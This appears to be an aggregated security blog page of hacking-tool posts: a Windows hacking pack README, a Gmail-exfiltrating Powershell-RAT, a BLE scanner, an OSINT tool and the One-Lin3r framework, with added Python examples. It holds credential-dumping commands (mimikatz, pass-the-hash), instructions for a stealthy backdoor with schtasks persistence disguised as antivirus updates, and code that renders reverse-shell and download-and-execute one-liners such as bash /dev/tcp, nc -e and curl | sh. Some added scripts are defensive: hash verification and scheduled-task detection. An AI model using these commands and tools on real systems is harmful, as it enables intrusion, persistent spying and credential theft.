Windows, Nintendo, and LinkedIN – Hack Naked News #170

This week, Apple and issues of trust, LinkedIN leaks, spending money on ransomware, dead fingerprints, mysterious medical hacks, and hacking the Nintendo switch with no patches even possible? Jason Wood from Paladin Security joins us for expert commentary, and more on this episode of Hack Naked News! Security News ‘iTunes Wi-Fi Sync’ Feature Could Let […]
The post Windows, Nintendo, and LinkedIN – Hack Naked News #170 appeared first on Security Weekly.


WHP – Microsoft Windows Hacking Pack

M$ Windows Hacking Pack
===========

Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may not be (eg. sysinternals).

"pes" means "PE Scrambled". It's useful sometimes.

Remote Exploits
===========

- Windows 2000 / XP SP1: MS05-039 Microsoft Plug and Play Service Overflow (works with SSDP too)
- XP/NT (before SP2): MS03-026 Microsoft RPC DCOM Interface Overflow
- XP (SP2 and SP3): MS08-067 Remote Stack Overflow Vulnerability Exploit (srvsvc) (can be used also for priv esc)
- Windows 7 and Server 2008 R2 (x64), all Service Packs: MS17-010 aka "Eternal Blue"
- Server 2016: DoS, may lead to exec ("Fuzzing SMB" video showing the crash)

Escalation
===========

First, if you have meterpreter, it may be a good idea to try "getsystem".

srvcheck3.exe
=====

Privilege escalation for Windows XP SP2 and before. This can exploit vulnerable services.

    srvcheck3.exe -m upnphost -H -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"

KiTrap0D.tar
=====

Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7 (MS10-015 / CVE-2010-0232).

Other ways of escalation listed
=====

- XP SP2 (and before): srvcheck3.exe – upnp service or SSDPSRV service
- Windows XP/2003: MS11-080 → Local Privilege Escalation Exploit, Afd.sys
- Vista/7: CVE-2010-4398 Elevation of Privileges (UAC Bypass)
- 8.1 (and before): MS14-058 → TrackPopupMenu Privilege Escalation
- 8.1 (and before): MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
- NT/2K/XP/2K3/Vista/2K8/7/8: KiTrap0D – EPATHOBJ Local Ring Exploit
- 10 (and before): Hot Potato (nbns spoof + wpad + smb ntlm)
- XP (and after): .lnk exploit for receiving NetNTLM hashes remotely. Link/URL based exploitation of NetNTLM hashes, eg. sending a link file in email or dropping it on a file share.

Dumping the SAM
=====

Files which contain the SAM:

- Windows/system32/config/SAM
- /WINDOWS/repair/SAM
- regedit.exe: HKEY_LOCAL_MACHINE -> SAM

Tools to get the SAM database if it is locked: pwdump, samdump, samdump2, Cain&Abel. Otherwise just copy it.

Dump SAM through a shadow volume: if one can be created, the database can be copied from it.

- Vista command: vssadmin create shadow
- Server 2008 command: diskshadow

Windows Credentials Editor
=====

WCE / Windows Credentials Editor can recover password hashes from LSASS – supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).

Mimikatz dumping
=====

    mimikatz # privilege::debug
    mimikatz # sekurlsa::logonpasswords
    mimikatz # lsadump::sam

Cachedump aka in-memory attacks for SAM hashes / Cached Domain Credentials
=====

fgdump.exe (contains pwdump and cachedump, can read from memory)

SAM dump (hive)
=====

"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."

Dump SAM, then spray hashes
=====

keimpx (try hashes with different users, against domain accounts)

LSA secrets dumping (memory)
=====

Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP: LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel (before Windows 8.1)

Pass the hash
=====

    pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 // cmd

PassTheTicket (Kerberos)
=====

mimikatz can do it.

Duplicate Access Tokens ("Kidnapping")
=====

If an admin access token can be used, it's a win. MS09-012: Churrasco.bin shell.bin (runs shell.bin as NT AUTHORITY\SYSTEM).

Notable tools
=====

psexec, smbshell, metasploit's psexec, etc. Also a linked tool (name not preserved in this copy) that allows you to visualize connections in an AD domain and find fast escalation ways.

To Be Added
===========

- Stuff for dumping passwords
- openvpn
- evilgrade

Hashes (SHA256) and VirusTotal scans
===========

    8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333 AwesomerShell.tar
    7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051 KiTrap0D.tar
    96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389 LICENSE.txt
    b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e ncat.exe
    da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b ncat_pes.exe
    be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b nc.exe
    56580f1eebdccfbc5ce6d75690600225738ddbe8d991a417e56032869b0f43c7 nmap-7.12-setup-gui.exe
    0cb7c3d9c4a0ce86f44ab4d0db2de264b64abbb83ef453afe05f5fddf330a1c5 nmap-7.12-win32_commandline.zip
    976c216119d5627afc9ad29fd4f72e38de3711d65419fda6482bc795e0ebf654 plink.exe
    952aa0bfb7ea58669fb50b945a09e9e69cd178739c5d1281a45ecfc54cc7f92f srvcheck3.exe
    ca5214e14ed5e879dd000a8a13895c474c89248386e9d337dd43f105a70f4170 PEScrambler.exe
    ef0f4bf2267b866a00b3e60c0e70f7f37cc5529fee417a625e502b3c93d215d9 SysinternalsSuite.zip
    8e9bc40efd17a37a4ecf7ada7a3d739f343e207abe4e17f05a531baccc607336 windows-privesc-check.exe
    6c367696e6cc8e6093426dbd19daf13b2375b0c078387ae6355519522d23b0fd windows-privesc-check.py
    ffe3808989bdfe986b17023e5d6583d49d644182e81234dc1db604e260ba76c9 fgdump.exe
    c36225d4515a92b905f8337acfd3d365cb813a2654e65067dbdba4fc58e7126a kaht2.zip
    2951e49efbc9e18d4641c0061f10da021b4bca2bd51247fe80107cbd334c195d mimikatz_2-1.zip
    0682a92bc96a66cf3e3eca1e44296838b9baad4feef0c391fc48044e039e642a ms08-067_exploit_31874.py
    cc4b4eceb04142b9e0794be029302feb33cf58c6a0cd1fdca3ff611df9b83827 ms08-067_exploit_7132.py
    950bbdde2cc92799675c138fd8dfb2b60f0c01759533bc1a6993559508bd131e Responder.tar
    54bd6cccf4c74604eb9956ce167a3ea94a06fabf4954e691d020023f8827c448 samdump2.exe
    ece925f85dc15b816dacacbb92ad41045f0cc58c2e10c5d3b66723ae11cf65c8 wce_getlsasrvaddr.exe
    c6333c684762ed4b4129c7f9f49c88c33384b66dfb1f100e459ec6f18526dff7 wce_v1_41beta_universal.exe
    ecbac2a6c0bf8dbc7bed2370ed098cd43a56b0d69a0db1d5715751270711f1d6 wce_v1_42beta_x32.exe
    5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976 sources/nc110.tgz
    47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9 sources/rdp2tcp-0.1.tar.gz
    33d109696d22b7e89f4eac6d07f4b4461551247ce2bfcbead09373ce39364f78 sources/srvcheck3.zip
    f706df25bb061a669b13ff76c121a8d72140406c7b0930bae5dcf713f9520a56 sources/3proxy-0.8.6.tar.gz
    7e8cfbf10bcc91fa9b9a60d3335d4a52bd6d4b6ca888533dbdd2afc86bebb5cc sources/3proxy-0.9-devel.tgz
    dec12905822ea64676d0ec58b62c00631ef8ddde2c700ffe74bfcf9026f17d81 sources/fgdump-2.1.0.tar.bz2
    352888e441be33ae6266cfac1a072d52cfaafd65cc33b07daa51600f1cd803ca sources/impacket_0-9-15.tar
    21faf49ae9ff08054214675f18d813bcf042798c325d68ae8b2417a119b439f4 sources/keimpx-0.3-dev.tar
    16136256911c31f7c56eef415b11e14c13abe89cface46df78033456194eddfd sources/mimikatz-2016-06.zip
    602659af30c565750fa01650e0a223d26355b5df98f2fbc30e3a6c593ed4e526 sources/samdump2-3.0.0.tar.bz2
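A pack like this bundles binaries from many third parties, so the published "<sha256> <filename>" list is the one thing a practitioner should check before running any of it. The script below is an added example, not part of the WHP repository: it parses a manifest in that shape, hashes every listed file, and reports matches, mismatches, listed-but-missing files and files on disk the manifest does not cover. The manifest and files it verifies are constructed in a temporary directory; the digests are computed there, not copied from the real pack.

```python
"""Verify a directory of downloaded tools against a published SHA256 manifest.

Added example (not WHP code). Manifest lines have the same "<sha256> <path>"
shape as the README's hash list; paths are relative to the pack root.
"""
import hashlib
import os
import tempfile


def parse_manifest(text):
    """Parse '<sha256> <relative path>' lines; blank lines and '#' comments are skipped."""
    manifest = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: expected '<sha256> <path>'")
        digest, path = parts[0].lower(), parts[1].strip()
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"line {lineno}: {digest!r} is not a SHA256 hex digest")
        manifest[path.replace("\\", "/")] = digest
    return manifest


def sha256_file(path, chunk=1 << 16):
    """Stream the file so large archives do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_tree(root, manifest):
    """Compare every listed file with its digest and note files the manifest does not cover."""
    report = {"ok": [], "mismatch": [], "missing": [], "unlisted": []}
    present = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            present.add(rel.replace(os.sep, "/"))
    for rel, expected in sorted(manifest.items()):
        if rel not in present:
            report["missing"].append(rel)
        elif sha256_file(os.path.join(root, rel)) == expected:
            report["ok"].append(rel)
        else:
            report["mismatch"].append(rel)
    report["unlisted"] = sorted(present - set(manifest))
    return report


def demo():
    """Build a constructed sample tree in a temp dir and verify it; returns the report."""
    root = tempfile.mkdtemp(prefix="whp-verify-")
    os.makedirs(os.path.join(root, "sources"))
    files = {  # constructed stand-ins, not the real binaries
        "nc.exe": b"constructed netcat stand-in",
        "sources/nc110.tgz": b"constructed tarball stand-in",
        "mimikatz_2-1.zip": b"constructed archive stand-in",
        "extra.exe": b"a file the manifest does not list",
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    # Two correct digests, one deliberately wrong (a swapped or tampered
    # binary) and one entry whose file is absent from the download.
    manifest_text = "\n".join([
        f"{hashlib.sha256(files['nc.exe']).hexdigest()} nc.exe",
        f"{hashlib.sha256(files['sources/nc110.tgz']).hexdigest()} sources/nc110.tgz",
        f"{'0' * 64} mimikatz_2-1.zip",
        f"{'f' * 64} plink.exe",
    ])
    return verify_tree(root, parse_manifest(manifest_text))


if __name__ == "__main__":
    for status, names in demo().items():
        print(f"{status:9}: {', '.join(names) or '-'}")
```

Anything in `mismatch` or `unlisted` is a reason to stop and re-download from the source the hashes were published for; a matching digest only proves the file is the one the pack author hashed, not that the tool is safe to run on a production host.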


Phishing 2FA Tokens with CredSniper – Tradecraft Security Weekly #25

Organizations are implementing two-factor authentication on more and more web services. The traditional methods for phishing credentials are no longer good enough to gain access to user accounts if 2FA is set up. In this episode Mike Felch (@ustayready) and Beau Bullock (@dafthack) demonstrate a tool that Mike wrote called CredSniper that assists in cloning portals for […]
The post Phishing 2FA Tokens with CredSniper – Tradecraft Security Weekly #25 appeared first on Security Weekly.


Powershell-RAT – Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. This RAT will help someone during red team engagements to backdoor any Windows machine. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.

Note: the author describes this code as Fully UnDetectable (FUD) by Anti-Virus (AV) software at the time of release. This project must not be used for illegal purposes or for hacking into systems where you do not have permission; it is strictly for educational purposes and for people to experiment with.

Any suggestions or ideas for this tool are welcome – just tweet me on @ManiarViral

Screenshots (images not included in this copy)

- On the first run of the Powershell-RAT the user gets the options listed below.
- Using the Hail Mary option to backdoor a Windows machine.
- Successfully taking screenshots of the user activity.
- Data exfiltrated as an email attachment using Gmail.

My Windows machine does not have Python installed, what should I do?

Compile it into an executable using PyInstaller. PyInstaller is available on PyPI; you can install it through pip:

    pip install pyinstaller

Setup

- A throwaway Gmail email address
- Enable "Allow less secure apps" on that Gmail account
- Modify the $username & $password variables for your account in the Mail.ps1 PowerShell file
- Modify $msg.From & $msg.To.Add with the throwaway Gmail address

How do I use this?

- Press 1: This option sets the execution policy to unrestricted using Set-ExecutionPolicy Unrestricted. This is useful on an administrator's machine.
- Press 2: This takes a screenshot of the current screen on the user machine using the Shoot.ps1 PowerShell script.
- Press 3: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesCore.
- Press 4: This option sends an email from the user machine using PowerShell. It uses the Mail.ps1 file to send the screenshot as an attachment to exfiltrate data.
- Press 5: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesUA.
- Press 6: This option deletes the screenshots from the user machine to remain stealthy.
- Press 7: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesDF.
- Press 8: This option performs all of the above with a single key press. The attacker receives an email every 5 minutes with screenshots as an attachment. Screenshots are deleted after 12 minutes.
- Press 9: Exit gracefully from the program (or press Control+C).

Questions? Twitter: @ManiarViral

Download Powershell-RAT
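From the defender's side, the persistence described above is three scheduled tasks with fixed, Microsoft-sounding names. The script below is an added detection example, not part of the Powershell-RAT project: it parses the CSV that `schtasks /query /fo CSV /v` produces and scores each task. The three task names come from the README; the other heuristics (a PowerShell action with an execution-policy bypass or a script in a user-writable path, and a Microsoft-looking name registered in the root task folder rather than under \Microsoft\Windows\) are this example's own assumptions, and the sample rows, including the command lines attributed to the malicious tasks, are constructed.

```python
"""Flag scheduled tasks that look like Powershell-RAT persistence.

Added detection example (not Powershell-RAT code). Input is the CSV form of
`schtasks /query /fo CSV /v`, reduced here to the columns the scoring uses.
"""
import csv
import io
import re

# Task names the Powershell-RAT README says it registers (options 3, 5 and 7).
RAT_TASK_NAMES = {
    "MicrosoftAntiVirusCriticalUpdatesCore",
    "MicrosoftAntiVirusCriticalUpdatesUA",
    "MicrosoftAntiVirusCriticalUpdatesDF",
}

# Constructed sample; the two PowerShell actions are invented for illustration.
SAMPLE_CSV = '''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WS01","\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start","%windir%\\system32\\sc.exe start wuauserv","SYSTEM","One Time Only, Minute"
"WS01","\\MicrosoftAntiVirusCriticalUpdatesCore","powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\alice\\AppData\\Roaming\\Shoot.ps1","alice","One Time Only, Minute"
"WS01","\\Adobe Acrobat Update Task","C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe","SYSTEM","Daily"
"WS01","\\MicrosoftEdgeUpdateTaskMachineCore","powershell -w hidden -ep bypass -f C:\\ProgramData\\upd.ps1","alice","Minute"
'''

POWERSHELL_RE = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
BYPASS_RE = re.compile(r"-(ExecutionPolicy|ep)\s+(Bypass|Unrestricted)", re.I)
USER_PATH_RE = re.compile(r"\\Users\\|\\ProgramData\\|%APPDATA%|%TEMP%", re.I)


def score_task(task):
    """Return (score, reasons) for one schtasks row; higher means more suspicious."""
    full = task["TaskName"]
    name = full.rsplit("\\", 1)[-1]
    folder = full[: len(full) - len(name)]  # "\\" for tasks registered at the root
    action = task["Task To Run"]
    score, reasons = 0, []
    if name in RAT_TASK_NAMES:
        score += 3
        reasons.append("task name matches Powershell-RAT persistence")
    if POWERSHELL_RE.search(action):
        if BYPASS_RE.search(action):
            score += 2
            reasons.append("PowerShell launched with an execution-policy bypass")
        if USER_PATH_RE.search(action):
            score += 2
            reasons.append("PowerShell script lives in a user-writable path")
    if name.lower().startswith("microsoft") and folder == "\\":
        # Weak on its own: some genuine vendor tasks (the Edge updater, for one)
        # also sit in the root folder, so this only adds weight to other signals.
        score += 1
        reasons.append("Microsoft-looking name registered in the root task folder")
    return score, reasons


def find_suspicious(csv_text, threshold=2):
    """Parse schtasks CSV output; return [(task name, score, reasons)] at or above threshold."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        score, reasons = score_task(row)
        if score >= threshold:
            hits.append((row["TaskName"].rsplit("\\", 1)[-1], score, reasons))
    return hits


if __name__ == "__main__":
    for name, score, reasons in find_suspicious(SAMPLE_CSV):
        print(f"[{score}] {name}: {'; '.join(reasons)}")
```

Run it against a real export with `schtasks /query /fo CSV /v > tasks.csv` and feed the file contents to `find_suspicious`; the scoring is deliberately additive so a renamed copy of the RAT still trips on the PowerShell and path signals even when the three known names are changed.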


Cisco, Kali, Equifax, & Facebook – Paul’s Security Weekly #550

In the news, Cisco hardcoded passwords, Kali on Windows, Equifax recovers $114 million on $26.5 million in expenses from breach, and more on this episode of Paul's Security Weekly! Larry's Stories: Cisco hardcoded passwords; Memcached DDoS will be a big deal – and some more, and a killswitch; CTFR – subdomain enumeration via TLS certificate transparency, scripted; Kali on Windows […]
The post Cisco, Kali, Equifax, & Facebook – Paul’s Security Weekly #550 appeared first on Security Weekly.


BLEAH – A BLE Scanner For “Smart” Devices Hacking

A BLE scanner for "smart" devices hacking based on the bluepy library, dead easy to use because poorly secured devices should be dead easy to hack. An explanatory post and screenshots can be found on the author's site.

How to Install

Install bluepy from source:

    git clone bluepy   # the bluepy repository (URL not preserved in this copy)
    cd bluepy
    python setup.py build
    sudo python setup.py install

Then install bleah:

    git clone bleah    # the bleah repository (URL not preserved in this copy)
    cd bleah
    python setup.py build
    sudo python setup.py install

Usage

From the -h help menu:

    usage: bleah [-h] [-i HCI] [-t TIMEOUT] [-s SENSITIVITY] [-b MAC] [-f] [-e] [-u UUID] [-d DATA] [-r DATAFILE]

    optional arguments:
      -h, --help                                show this help message and exit
      -i HCI, --hci HCI                         HCI device index.
      -t TIMEOUT, --timeout TIMEOUT             Scan delay, 0 for continuous scanning.
      -s SENSITIVITY, --sensitivity SENSITIVITY dBm threshold.
      -b MAC, --mac MAC                         Filter by device address.
      -f, --force                               Try to connect even if the device doesn't allow to.
      -e, --enumerate                           Connect to available devices and perform services enumeration.
      -u UUID, --uuid UUID                      Write data to this characteristic UUID (requires --mac and --data).
      -d DATA, --data DATA                      Data to be written.
      -r DATAFILE, --datafile DATAFILE          Read data to be written from this file.

Examples

Keep scanning for BTLE devices:

    sudo bleah -t0

Connect to a specific device and enumerate all the things:

    sudo bleah -b "aa:bb:cc:dd:ee:ff" -e

Write the bytes "hello world" to a specific characteristic of the device:

    sudo bleah -b "aa:bb:cc:dd:ee:ff" -u "c7d25540-31dd-11e2-81c1-0800200c9a66" -d "hello world"

Download BLEAH


Information gathering tool – OSINT

GasMasK is an Information gathering tool.

Download: git clone (repository URL not preserved in this copy)

Information gathering sources: ask, bing, crt, dns, dogpile, github, google, googleplus, instagram, linkedin, netcraft, pgp, reddit, reverse dns, twitter, vhosts, virustotal, whois, yahoo, yandex, youtube
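Two items on this page lean on certificate transparency for passive subdomain discovery: the "crt" source in GasMasK's list above and CTFR from the Paul's Security Weekly #550 notes, which queries crt.sh. The code below is an added example, not code from either project. It shows the post-processing that step needs once the JSON comes back: splitting the newline-separated SAN list in each record, lower-casing, separating wildcard names, discarding names that merely contain the target domain without being under it, and dropping malformed entries. The sample response is constructed; `fetch_ct_json` performs the live query against the real crt.sh JSON endpoint but is not called by the offline demo.

```python
"""Turn certificate-transparency results into a de-duplicated subdomain list.

Added example (not GasMasK or CTFR code). Input is crt.sh's JSON output for
a "%.domain" query; only the common_name and name_value fields are used.
"""
import json
import re
import urllib.request

# One or more labels followed by a final label; no underscores, no spaces.
HOSTNAME_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$"
)

# Constructed stand-in for a crt.sh response, trimmed to the fields used here.
SAMPLE_CT_JSON = json.dumps([
    {"common_name": "www.example.com", "name_value": "www.example.com\nexample.com"},
    {"common_name": "*.dev.example.com", "name_value": "*.dev.example.com\napi.dev.example.com"},
    {"common_name": "MAIL.Example.com", "name_value": "MAIL.Example.com"},
    {"common_name": "example.com.evil.test", "name_value": "example.com.evil.test"},
    {"common_name": "vpn.example.com", "name_value": "vpn.example.com"},
    {"common_name": "vpn.example.com", "name_value": "vpn.example.com"},  # reissued cert
    {"common_name": "bad host.example.com", "name_value": "bad host.example.com"},  # malformed
])


def ct_query_url(domain):
    """crt.sh JSON endpoint for every cert naming something under `domain` (%25 is an encoded '%')."""
    return f"https://crt.sh/?q=%25.{domain}&output=json"


def fetch_ct_json(domain, timeout=30):
    """Live query; not used by the offline demo."""
    with urllib.request.urlopen(ct_query_url(domain), timeout=timeout) as resp:
        return resp.read().decode("utf-8")


def subdomains_from_ct(json_text, domain):
    """Return {"hosts": [...], "wildcards": [...]} for names under `domain`, sorted and unique."""
    domain = domain.lower().strip(".")
    suffix = "." + domain
    hosts, wildcards = set(), set()
    for entry in json.loads(json_text):
        # name_value carries every SAN of the cert, newline-separated; the
        # common_name usually repeats one of them, so both are considered.
        candidates = entry.get("name_value", "").split("\n") + [entry.get("common_name", "")]
        for raw in candidates:
            name = raw.strip().lower().rstrip(".")
            if not name:
                continue
            is_wild = name.startswith("*.")
            if is_wild:
                name = name[2:]
            # example.com.evil.test contains the domain but is not under it.
            if not (name == domain or name.endswith(suffix)):
                continue
            if not HOSTNAME_RE.match(name):
                continue
            if is_wild:
                wildcards.add("*." + name)  # a wildcard is not evidence that its base host exists
            else:
                hosts.add(name)
    return {"hosts": sorted(hosts), "wildcards": sorted(wildcards)}


if __name__ == "__main__":
    result = subdomains_from_ct(SAMPLE_CT_JSON, "example.com")
    print("\n".join(result["hosts"]))
    print("wildcards:", ", ".join(result["wildcards"]) or "-")
```

Wildcards are kept apart on purpose: a `*.dev.example.com` certificate tells you the zone exists but names no host, so those entries feed a brute-force or DNS step rather than the host list itself.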


One-Lin3r – Gives you one-liners that aids in penetration testing operations

One-Lin3r is a simple and light-weight framework inspired by the web-delivery module in Metasploit. It consists of various one-liners that aid in penetration testing operations:

- Reverser: Give it an IP & port and it returns a reverse shell liner ready for copy & paste.
- Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.
- Other: Holds liners with general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc.) on the trending OSes (Windows, Linux, and macOS). "More OSes can be added too".

Features

- Search for any one-liner in the database by its full name or partially.
- You can add your own liners by following the documented steps to create a ".liner" file. You can also send it to me directly and it will be added to the framework and credited with your name.
- Autocomplete any framework command, with recommendations in case of typos (in case you love hacking like in the movies).
- Command line arguments can be used to give the framework a resource file to load and execute for automation.
- The ability to reload the database if you added any liner, without restarting the framework.
- You can add any platform to the payloads database just by making a folder in the payloads folder and creating a ".liner" file there.
- More…

The payloads database is not that big in the meantime because this is the first edition, but it will get bigger with updates and contributions.

Screenshots (images not included in this copy)

Usage

Command line arguments:

    usage: [-h] [-r R] [-x X] [-q]

    optional arguments:
      -h, --help  show this help message and exit
      -r          Execute a resource file (history file).
      -x          Execute a specific command (use ; for multiples).
      -q          Quiet mode (no banner).

Framework commands:

    Command           Description
    --------          -------------
    help/?            Show this help menu
    list/show         List payloads you can use in the framework
    search <keyword>  Search payloads for a specific one
    use <payload>     Use an available payload
    info <payload>    Get information about an available payload
    banner            Display banner
    reload/refresh    Reload the payloads database
    check             Prints the core version and database version, then checks for them online
    history           Display the most important command line history from the beginning
    save_history      Save command line history to a file
    exit/quit         Exit the framework

Installing and requirements

To make the tool work at its best you must have:

- Python 3.x or 2.x (3 preferred).
- Linux (tested on Kali rolling) or Windows (not tested yet on macOS but it should work).
- The requirements mentioned in the next few lines.

Installing

For Windows (after downloading the ZIP and unzipping it):

    cd One-Lin3r-master
    python -m pip install -r win_requirements.txt
    python -h

For Linux:

    git clone (repository URL not preserved in this copy)
    chmod 777 -R One-Lin3r
    cd One-Lin3r
    pip install -r requirements.txt
    python -h

The recursive chmod 777 is broader than needed: read permission on the files (and execute on the directory) is enough to run the framework, and a world-writable tool directory on a shared host lets any local user edit the liners you will paste into a target.

Video | Contact: Twitter | Download One-Lin3r
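The core of a framework like this is small: a per-platform store of templates, a partial-match search, and a `use` step that fills in the parameters a liner needs. The code below is an added example, not One-Lin3r's own code; the page does not describe the ".liner" file format, so the in-memory `LINERS` dict is an assumption standing in for the per-platform payload folders, and the `{{name}}` placeholder syntax is this example's own. It goes one step beyond the text by validating the parameters (IP, port range, URL scheme) before rendering, which catches the copy-and-paste mistakes a copy-and-paste tool invites.

```python
"""Minimal one-liner store with search, info and parameterised rendering.

Added example (not One-Lin3r code). The database layout and placeholder
syntax are assumptions; the liners themselves are standard public one-liners.
"""
import ipaddress
import re

PLACEHOLDER = re.compile(r"\{\{(\w+)\}\}")

# platform -> "category/name" -> (description, template). Double braces mark
# parameters so single braces inside shell or PowerShell syntax are left alone.
LINERS = {
    "linux": {
        "reverser/bash_tcp": ("bash reverse shell via /dev/tcp",
                              "bash -i >& /dev/tcp/{{ip}}/{{port}} 0>&1"),
        "reverser/nc_e": ("netcat reverse shell (needs an nc built with -e)",
                          "nc -e /bin/sh {{ip}} {{port}}"),
        "dropper/curl_sh": ("download a script with curl and run it",
                            "curl -fsSL {{url}} | sh"),
    },
    "windows": {
        "dropper/certutil": ("download an executable with certutil and run it",
                             "certutil -urlcache -split -f {{url}} %TEMP%\\p.exe && %TEMP%\\p.exe"),
        "other/mimikatz_logonpasswords": ("dump logon credentials with mimikatz",
                                           'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),
    },
    "macos": {
        "reverser/python": ("python reverse shell",
                            "python -c 'import socket,subprocess,os;s=socket.socket();"
                            "s.connect((\"{{ip}}\",{{port}}));[os.dup2(s.fileno(),f) for f in (0,1,2)];"
                            "subprocess.call([\"/bin/sh\",\"-i\"])'"),
    },
}


def _check_port(value):
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {value}")
    return str(port)


def _check_url(value):
    if not re.match(r"https?://[^\s\"']+$", value):
        raise ValueError(f"not an http(s) URL: {value}")
    return value


# Per-parameter validators; anything without one is used as given.
VALIDATORS = {
    "ip": lambda v: str(ipaddress.ip_address(v)),  # raises ValueError on junk
    "port": _check_port,
    "url": _check_url,
}


def search(term=""):
    """Case-insensitive partial match over 'platform/category/name' keys."""
    term = term.lower()
    return sorted(f"{p}/{n}" for p, names in LINERS.items() for n in names
                  if term in f"{p}/{n}".lower())


def info(key):
    """Description and the parameters a liner needs, read from its placeholders."""
    platform, name = key.split("/", 1)
    desc, template = LINERS[platform][name]
    return {"platform": platform, "name": name, "description": desc,
            "params": sorted(set(PLACEHOLDER.findall(template)))}


def use(key, **params):
    """Render a liner; KeyError for a missing parameter, ValueError for an invalid one."""
    platform, name = key.split("/", 1)
    _, template = LINERS[platform][name]
    missing = set(PLACEHOLDER.findall(template)) - set(params)
    if missing:
        raise KeyError(f"{key} needs: {', '.join(sorted(missing))}")

    def fill(match):
        field = match.group(1)
        return VALIDATORS.get(field, str)(params[field])

    return PLACEHOLDER.sub(fill, template)


if __name__ == "__main__":
    for key in search("reverser"):
        print(key, "->", info(key)["params"])
    print(use("linux/reverser/bash_tcp", ip="10.0.0.5", port=4444))
```

Validation runs inside the placeholder substitution, so a template that needs a new parameter type only needs an entry in `VALIDATORS`; a liner with no placeholders (the mimikatz one) renders unchanged.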